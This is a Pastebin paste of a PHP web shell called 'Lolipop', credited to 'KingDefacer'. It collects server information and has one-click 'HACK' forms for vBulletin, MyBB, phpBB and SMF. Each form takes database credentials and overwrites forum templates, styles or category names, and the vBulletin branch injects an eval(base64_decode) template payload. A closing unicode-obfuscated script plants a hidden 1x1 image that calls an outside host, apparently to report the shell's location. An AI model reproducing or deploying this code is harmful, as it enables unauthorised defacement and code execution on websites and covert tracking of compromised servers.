Advertisement
blackcyberrootshell

[ + ] Lolipop Shell [ + ]

Mar 3rd, 2015
363
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 13.73 KB | None | 0 0
  1. <p align="right"></p><body bgcolor="#FFFFFF">
  2. <?php
  3.  
  4. ######################## Begining of Coding ;) ######################
  5. error_reporting(0);
  6.  
  7.     $info = $_SERVER['SERVER_SOFTWARE'];
  8.     $site = getenv("HTTP_HOST");
  9.     $page = $_SERVER['SCRIPT_NAME'];
  10.     $sname = $_SERVER['SERVER_NAME'];
  11.     $uname = php_uname();
  12.     $smod = ini_get('safe_mode');
  13.     $disfunc = ini_get('disable_functions');
  14.     $yourip = $_SERVER['REMOTE_ADDR'];
  15.     $serverip = $_SERVER['SERVER_ADDR'];
  16.     $version = phpversion();
  17.     $ccc = realpath($_GET['chdir'])."/";
  18.     $fdel = $_GET['fdel'];
  19.     $execute = $_POST['execute'];
  20.     $cmd = $_POST['cmd'];
  21.     $commander = $_POST['commander'];
  22.     $ls = "ls -la";
  23.     $source = $_POST['source'];
  24.     $gomkf = $_POST['gomkf'];
  25.     $title = $_POST['title'];
  26.     $sourcego = $_POST['sourcego'];
  27.     $ftemp = "tmp";
  28.     $temp = tempnam($ftemp, "cx");
  29.     $fcopy = $_POST['fcopy'];
  30.     $tuser = $_POST['tuser'];
  31.     $user = $_POST['user'];
  32.     $wdir = $_POST['wdir'];
  33.     $tdir = $_POST['tdir'];
  34.     $symgo = $_POST['symgo'];
  35.     $sym = "xhackers.txt";
  36.     $to = $_POST['to'];
  37.     $sbjct = $_POST['sbjct'];
  38.     $msg = $_POST['msg'];
  39.     $header = "From:".$_POST['header'];
  40.  
  41.  
  42. //PHPinfo
  43.  
  44. if(isset($_POST['phpinfo']))
  45. {
  46.     die(phpinfo());
  47. }
  48. //Guvenli mod vs vs
  49. if ($smod)
  50. {
  51.     $c_h = "<font color=red face='Verdana' size='1'>ON</font>";
  52. }
  53. else
  54. {
  55.     $c_h = "<font face='Verdana' size='1' color=green>OFF</font>";
  56. }
  57.  
  58. //Kapali Fonksiyonlar
  59. if (''==($disfunc))
  60. {
  61.     $dis = "<font color=green>None</font>";
  62. }
  63. else
  64. {
  65.     $dis = "<font color=red>$disfunc</font>";
  66. }
  67. //Dizin degisimi
  68. if(isset($_GET['dir']) && is_dir($_GET['dir']))
  69. {
  70.  chdir($_GET['dir']);
  71. }
  72.  
  73. $ccc = realpath($_GET['chdir'])."/";
  74.  
  75. //Baslik
  76. echo "<head>
  77. <style>
  78. body { font-size: 12px;
  79.  
  80.           font-family: arial, helvetica;
  81.  
  82.            scrollbar-width: 5;
  83.  
  84.            scrollbar-height: 5;
  85.  
  86.            scrollbar-face-color: black;
  87.  
  88.            scrollbar-shadow-color: silver;
  89.  
  90.            scrollbar-highlight-color: silver;
  91.  
  92.            scrollbar-3dlight-color:silver;
  93.  
  94.            scrollbar-darkshadow-color: silver;
  95.  
  96.            scrollbar-track-color: black;
  97.  
  98.            scrollbar-arrow-color: silver;
  99.  
  100.    }
  101. </style>
  102.  
  103. <title>Lolipop.php - Edited By KingDefacer - [$site]</title></head>";
  104. //Ana tablo
  105. echo "<body text='#FFFFFF'>
  106. <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'>
  107.    <tr>
  108.        <td><font color='#000000'>
  109.  
  110.  
  111.          <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font>
  112.  
  113.    </tr>
  114.    <tr>
  115.        <td  style='border: 1px solid #333333'>
  116.        <font face='Verdana' size='1' color='#000000'>Site: <u>$site</u><br>Server name: <u>$sname</u><br>Software: <u>$info</u><br>Version : <u>$version</u><br>Uname -a: <u>$uname</u><br>Path: <u>$ccc</u><br>Safemode: <u>$c_h</u><br>Disable Functions: <u>$dis</u><br>Page: <u>$page</u><br>Your IP: <u>$yourip</u><br>Server IP: <u><a href='http://whois.domaintools.com/".$serverip."'>$serverip</a></u></font></td>  
  117.    </tr>
  118. </table>";
  119. echo '<td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font>    </tr>
  120. ';
  121. //Buton Listesi
  122. echo "<center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value='  phpBB HACK.  '><input type=submit name=smf value='  SMF HACK.  '></form></center>";
  123.  
  124.  
  125.  
  126.  
  127. //VB HACK
  128. if (isset($_POST['vbulletin']))
  129. {
  130. echo "<center><table border=0 width='100%'>
  131. <tr><td>
  132. <center><font face='Arial' color='#000000'>==Lolipop VB index.==</font></center>
  133.    <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=dbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  134.          <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=dbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  135.          <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=dbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  136.          
  137.          <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=dbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  138.          <font face='Arial' color='#000000'>?ndexin Yaz?lacag? B?l?m</font><br><textarea name=index rows='19' cols='103' style='color: #000000; background-color: #FFFFFF'>buraya indexiniz gelecek.?ndexi yaz postala kay gitsin.</textarea><br>
  139.          <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
  140. die();
  141. }
  142. $KingDefacer="Powered By Lolipop :))";
  143. $dbh = $_POST['dbh'];
  144. $dbu = $_POST['dbu'];
  145. $dbn = $_POST['dbn'];
  146. $dbp = $_POST['dbp'];
  147. $index = $_POST['index'];
  148. $index=str_replace("\'","'",$index);
  149. $set_index  = "{\${eval(base64_decode(\'";
  150.  
  151. $set_index .= base64_encode("echo \"$index\";");
  152.  
  153.  
  154. $set_index .= "\'))}}{\${exit()}}</textarea>";
  155.  
  156.  
  157. if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index))
  158. {
  159. mysql_connect($dbh,$dbu,$dbp) or die(mysql_error());
  160. mysql_select_db($dbn) or die(mysql_error());
  161. $loli1 = "UPDATE template SET template='".$set_index."".$KingDefacer."' WHERE title='spacer_open'";
  162. $loli2 = "UPDATE template SET template='".$set_index."".$KingDefacer."' WHERE title='FORUMHOME'";
  163. $loli3 = "UPDATE style SET css='".$set_index."".$KingDefacer."', stylevars='', csscolors='', editorstyles=''";
  164. $result = mysql_query($loli1) or die (mysql_error());
  165. $result = mysql_query($loli2) or die (mysql_error());
  166. $result = mysql_query($loli3) or die (mysql_error());
  167. echo "<script>alert('Vb Hacked');</script>";
  168. }
  169.  
  170. //MyBB Hack
  171. if (isset($_POST['mybulletin']))
  172. {
  173. echo "<center><table border=0 width='100%'>
  174. <tr><td>
  175. <center><font face='Arial' color='#000000'>==Lolipop MyBB index.==</font></center>
  176.    <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=mybbdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  177.          <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=mybbdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  178.          <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=mybbdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  179.          <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=mybbdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  180.          <font face='Arial' color='#000000'>?ndexin Yaz?lacag? B?l?m</font><br><textarea name=mybbindex rows='19' cols='103' style='color: #000000; background-color: #FFFFFF'>buraya indexiniz gelecek.?ndexi yaz postala kay gitsin.</textarea><br>
  181.          <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
  182. die();
  183. }
  184. $mybb_dbh = $_POST['mybbdbh'];
  185. $mybb_dbu = $_POST['mybbdbu'];
  186. $mybb_dbn = $_POST['mybbdbn'];
  187. $mybb_dbp = $_POST['mybbdbp'];
  188. $mybb_index = $_POST['mybbindex'];
  189.  
  190. if (!empty($mybb_dbh) && !empty($mybb_dbu) && !empty($mybb_dbn) && !empty($mybb_index))
  191. {
  192. mysql_connect($mybb_dbh,$mybb_dbu,$mybb_dbp) or die(mysql_error());
  193. mysql_select_db($mybb_dbn) or die(mysql_error());
  194. $prefix="mybb_";
  195. $loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
  196.  
  197. $result = mysql_query($loli7) or die (mysql_error());
  198.  
  199. echo "<script>alert('MyBB Hacked');</script>";
  200. }
  201. //PhpBB
  202. if (isset($_POST['phpbb']))
  203. {
  204. echo "<center><table border=0 width='100%'>
  205. <tr><td>
  206. <center><font face='Arial' color='#000000'>==Lolipop PHPBB index.==</font></center>
  207.    <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=phpbbdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  208.          <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=phpbbdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  209.          <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=phpbbdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  210.          <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=phpbbdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  211.          <font face='Arial' color='#000000'>Yazi Veya  KOD<br></font><input type=text name=phpbbkat size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  212.          <font face='Arial' color='#000000'>Degisecek KATEGORI ID si<br></font><input type=text name=katid size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  213.          <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
  214. die();
  215. }
  216. $phpbb_dbh = $_POST['phpbbdbh'];
  217. $phpbb_dbu = $_POST['phpbbdbu'];
  218. $phpbb_dbn = $_POST['phpbbdbn'];
  219. $phpbb_dbp = $_POST['phpbbdbp'];
  220. $phpbb_kat = $_POST['phpbbkat'];
  221. $kategoriid=$_POST['katid'];
  222.  
  223. if (!empty($phpbb_dbh) && !empty($phpbb_dbu) && !empty($phpbb_dbn) && !empty($phpbb_kat))
  224. {
  225. mysql_connect($phpbb_dbh,$phpbb_dbu,$phpbb_dbp) or die(mysql_error());
  226. mysql_select_db($phpbb_dbn) or die(mysql_error());
  227.  
  228.  
  229. $loli10 = "UPDATE phpbb_categories  SET cat_title='".$phpbb_kat."' WHERE cat_id='".$kategoriid."'";
  230.  
  231. $result = mysql_query($loli10) or die (mysql_error());
  232.  
  233. echo "<script>alert('PhpBB Hacked');</script>";
  234. }
  235. //SmfHACK
  236. if (isset($_POST['smf']))
  237. {
  238. echo "<center><table border=0 width='100%'>
  239. <tr><td>
  240. <center><font face='Arial' color='#000000'>==Lolipop SMF Index.==</font></center>
  241.    <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=smfdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  242.          <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=smfdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  243.          <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=smfdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  244.          <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=smfdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  245.                    <font face='Arial' color='#000000'>Yazi Yada KOD<br></font><input type=text name=smf_index size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  246.                    <font face='Arial' color='#000000'>Degisecek KATEGORI ID si <br></font><input type=text name=katid size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
  247.  
  248.          <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
  249. die();
  250. }
  251. $smf_dbh = $_POST['smfdbh'];
  252. $smf_dbu = $_POST['smfdbu'];
  253. $smf_dbn = $_POST['smfdbn'];
  254. $smf_dbp = $_POST['smfdbp'];
  255. $smf_index = $_POST['smf_index'];
  256. $smf_katid=$_POST['katid'];
  257.  
  258. if (!empty($smf_dbh) && !empty($smf_dbu) && !empty($smf_dbn) && !empty($smf_index))
  259. {
  260. mysql_connect($smf_dbh,$smf_dbu,$smf_dbp) or die(mysql_error());
  261. mysql_select_db($smf_dbn) or die(mysql_error());
  262. $prefix="smf_";
  263. $loli12 = "UPDATE ".$prefix."categories SET name='".$smf_index."' WHERE ID_CAT='".$smf_katid."'";
  264.  
  265. $result = mysql_query($loli12) or die (mysql_error());
  266.  
  267. echo "<script>alert('smf Hacked');</script>";
  268. }
  269.  
  270.  
  271. //Alt taraf
  272. echo "
  273.  
  274.  
  275. <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'>
  276. <tr>
  277. <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'>
  278.  
  279.  <p><strong>Lolipop.php</strong></p>
  280.  <p><strong>Edited By KingDefacer</strong></p>
  281. <p><strong></strong><br>
  282. </p></td>
  283. </tr></table>";
  284.  
  285.  
  286.  
  287. // Kod bitisi
  288. ?>
  289. <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement